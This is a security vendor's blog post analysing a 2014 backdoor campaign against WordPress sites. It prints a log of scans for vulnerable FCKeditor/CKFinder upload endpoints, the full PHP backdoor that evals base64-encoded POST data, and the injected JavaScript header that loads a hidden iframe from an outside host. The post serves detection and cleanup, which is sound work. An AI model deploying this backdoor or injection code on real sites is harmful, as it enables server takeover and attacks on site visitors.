Sunday, November 23, 2014

Backdoor Malware Targeting WordPress Websites

Backdoor Malware In The Wild Targeting WordPress Websites



If your website gets reinfected every 20-30 minutes. If blacklisting authorities like Google Safe Browsing does not keep up with the reinfection and fail to inform you. If you run WordPress platform and use 3-d party plugins/themes.

Then, it is likely you suffer from Backdoor that our malware research labs have recently discovered while cleaning customer websites.

You can check your site with our external and free scan using Quttera Free Website Malware Scanner


Background of the infection


How many websites attacked?


There is no exact number but more than two thousands. During first weeks of this infection Google didn't recognize it. The malware code included logic to clean-up previous infection and insert a new one.

Which platforms were targeted?


Current version mostly aimed WordPress installations.


What malicious action was applied to victim sites and their visitors?


Successful attack injected hidden iframes into every JavaScript file. On home page load, visitor's web browser loaded numerous JS files and got connected in background to several other websites via iframes.


How many files were infected?


All JavaScript files available on attacked server.


Where the files were located?


All infected files located in wp-content and wp-include directories.


The root cause


How backdoor was identified?


One of our customers was blacklisted by Google due to another kind of infection. During the investigation current malware was uncovered as well. At the same time, we detected this infection on websites of our other customers, which bypassed Google's and other's radars.


Backdoor details


A backdoor (or just shell file) was uploaded utilizing themes/plugins vulnerabilities. Following is an example of how attacker searched for available vulnerability using HTTP HEAD request:

"HEAD /fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 "HEAD /fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 318 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 318 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/aspx/connector.aspx HTTP/1.1" 404 318 "-" "-" "HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"


All of those were attempts to find a way to upload the following backdoor which is then used to infect the server:

<?php if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;


The backdoor decoded content of the "message" field provided in HTTP post request,

$message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message'])))))


executed provided commands,

eval($message)

and printed script output into returned HTML,

{echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

The script is generic and it permites execution of any PHP code provided in "message" argument.

Finally, the target of this backdoor/shell was to execute and input script which then infected all JS files on the compromised system.

The actual infection is a header, prepended  to every JS file:

/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*) "));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase( );var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone ','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure" )===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://iframehost/something17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */


Attack flow


So how this worked?

  1. Server A searched the web for WordPress installations with known vulnerabilities.
  2. Backdoor/Shell uploaded to servers detected in step (1).
  3. Server B invokes the shell with a PHP code that performs JS files infection.
  4. Re-infection occurs every 20-30 minutes.


Malware clean-up


As a first step, we have identified the organization that owned the IP. We have then contacted the hosting provider and filed malware/abuse report.

We have conducted all necessary steps to clean up the 3K+ infected files, updated all outdated software and remode vulnerable plugins.

If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.